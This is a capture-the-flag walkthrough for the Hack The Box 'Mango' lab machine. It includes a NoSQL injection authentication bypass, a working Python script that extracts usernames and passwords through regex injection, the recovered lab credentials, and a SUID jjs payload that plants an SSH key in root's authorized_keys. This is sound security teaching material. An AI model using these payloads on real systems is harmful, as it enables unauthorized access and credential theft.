Mango HTB
IP
10.10.10.162initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.162 | cut -d"/" -f1 | tr '\n' ','we have the following ports open on the machine
22,80,443Lets run a more in-depth scan of the target
sudo nmap -sCV -p22,80,443 -oA nmap_results 10.10.10.162results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn:
|_ http/1.1
|_http-title: Mango | Search Base
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 secondswe can see
SSH is running on the target
Both HTTP and HTTPS is running on the target
Most likely a ubuntu machine\
Looks like we have the domain name and a hostname name
mango.htbandstaging-order.mango.htbwe will add these to our hosts file
Lets check out Port 443 first
Looks like some kind of search engine
Lets get feroxbuster running and see if we can find anything
feroxbuster -u https://mango.htb:443 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -k -o dirs.txtresults
200 GET 216l 514w 5152c https://mango.htb/index.php
200 GET 15331l 41447w 397607c https://mango.htb/analytics.php
200 GET 216l 514w 5152c https://mango.htb/Looking at the ssl certificate we can see the following
we can see a email
admin@mango.htb
We could test this search base for any injection attacks using sqlmap
first lets catch a request with burp, save the request to a file
run
sqlmapon the request we saved
sqlmap -r r.txt --batch --force-ssl --level=5HTTP
when we check out staging-order.mango.htb we can see a login screen
Lets bust out feroxbuster and see if we can find anything
feroxbuster -u http://staging-order.mango.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs_http.txtNothing interesting
Lets catch the login request with burp
Lets save this as a file and run sqlmap, we want to find if this is vulnerable to any injection type of attacks
sqlmap -r login.req --batchNothing interesting
I'm going to take a guesse and say this web application utilises mongo NoSQL given the name of the box and well the pictures of the mangos
Lets run with this so first we need to check if this is indeed vulnerable to an injection attack
here is a blog that explains this better then i could
alright we have a request of the login in burp we send that over to repeater
Now what we can do to bypass authentication is the following
notice the [$ne] , this is a common operator within NoSQL meaning 'not equal to' now we are essentially saying
username is not equal to 'shrek123'
password is not equal to 'shrek123'
because both of these statements are true, we are authenticated to the page
not much here
since we know we have a injection point within the login prompt, maybe we can dump some passwords
we can utilise the $regex filter
for example we can see if the first letter of the user admin's password is x
username=username&password[$regex]=^x.*&login=loginNow lets create a python script to brute force the usernames and passwords
import sys
import string
import requests
class MangoBruteForcer:
def __init__(self, url):
#Constructor to initialize the class with the target URL
self.url = url
def brute_password(self, user):
#Function to brute force the password for a given username
password = ""
while True:
#Iterate over each character in the ASCII letters, digits and punctuations
for c in string.ascii_letters + string.digits + string.punctuation:
#Skip apecial characters that may interfere with the URL
if c in ["*", "+", ".", "?", "|", "\\"]:
continue
#Display the current password attempt in the console
sys.stdout.write(f"\r[+] Password: {password}{c}")
sys.stdout.flush()
#Send a POST request to the target URL with the current username and password regex
resp = requests.post(
self.url,
data={
"username": user,
"password[$regex]": f"^{password}{c}.*",
"login": "login",
},
)
# Check if the response indicates a successful login attempt
if "We just started farming!" in resp.text:
# If successful, update the password and make a final login attempt
password += c
resp = requests.post(
self.url,
data={"username": user, "password": password, "login": "login"},
)
#Check if the final login attempt is successful
if "We just started farming!" in resp.text:
#Print the found password and return from the function
print(f"\r[+] Found password for {user}: {password.ljust(20)}")
return
def brute_user(self, res):
# Function to brute-force the username and call brute_password on each attempt
found = False
for c in string.ascii_letters + string.digits:
# Display the current username attempt to the console
sys.stdout.write(f"\r[*] Trying Username: {res}{c.ljust(20)}")
sys.stdout.flush()
# Send a POST request to the target URL with the current username regex
resp = requests.post(
self.url,
data={
"username[$regex]": f"^{res}{c}",
"password[$gt]": "",
"login": "login",
},
)
# Check if the response indicates a successful username attempt
if "We just started farming!" in resp.text:
found = True
self.brute_user(res + c)
if not found:
print(f"\r[+] Found user: {res.ljust(20)}")
self.brute_password(res)
if __name__ == "__main__":
try:
target_url = "http://staging-order.mango.htb/"
brute_forcer = MangoBruteForcer(target_url)
initial_user = ""
brute_forcer.brute_user(initial_user)
except Exception as e:
print(f"Error: {e}")
Now Lets run this script
we have 2 users and associated password
[+] Found user: admin
[+] Found password for admin: t9KcS3>!0B#2
[+] Found user: mango
[+] Found password for mango: h3mXK8RhU~f{]f5H
[*] Trying Username: 9 Lets see if we can ssh into the machine'
ssh mango@10.10.10.162we have a SSH session as mango
if we look within the home directory we can see both admin and mango
Lets see if we can switch our user to admin, using the admin password we found
su adminwe are admin, but we dont have sudo privileges on the machine
When we search for SUID files, we can see the following
find / -type f -perm /4000 2>/dev/nullwe do find something interesting
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
what we can do is write to a file (/root/.ssh/authroized_keys) and drop a SSH key into the file and ssh in as root, to do this
Let's generate some keys
mkdir .ssh
ssh-keygen
Lets create a exploit script using the knowledge from gtfobins
copy the location of the authorized_keys file
/root/.ssh/authorized_keyscopy our public key so it can be written to authorized_keys
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDlS7FNv4N/P3/iUoWjOi/35AK8dXaDiS/Aq9S8h3nmdiYCIl0FOCWu1npPKN/mfzs3rtTtuk3AjMFsVByrpJpWcH77zpe72z/ZTA2Pn3ZHW5PjZYWJ9QvE9PiinIPAC4kt7H9DpRiu37mN+HWpB0g6OMHMLQWNYKcou7rhLnn1eNhB4rCOUvCG2jTTNt0muYzAPZ3LB1TNI0eWVZBevAlXIXrlpeCGmWAzxT+lcTHD7a7zbYg/EMeeKwk3KDfQy83C9yOUDYM6d8IVV75avly49bFt/SOJyqLXo2WXeRXEyOQvOqIi3LoiuP6JR6EdQtX4FRA38ECs+DnEObW/1tIaR3AATM1T23mdmBNnAr9ZJzwFlBkILXX4HQnmzfDTrbBwEj3lgGBKDZp80dU7yUjrs1jkVOhaD34qbeX+ARzyAQwP9LRnVmyNoBH2oCaDs0suchmisvNm/wqfcjkEUSeBQ/HUiRsUbnxUZB6a7HrKiSVP6ap3RCP3gTPn3xT5F/k=");
fw.close();' | jjscopy and past the exploit in our SSH session
Lets give our private key the necessary permissions and SSH into the machine as root
chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.162we are now root
Last updated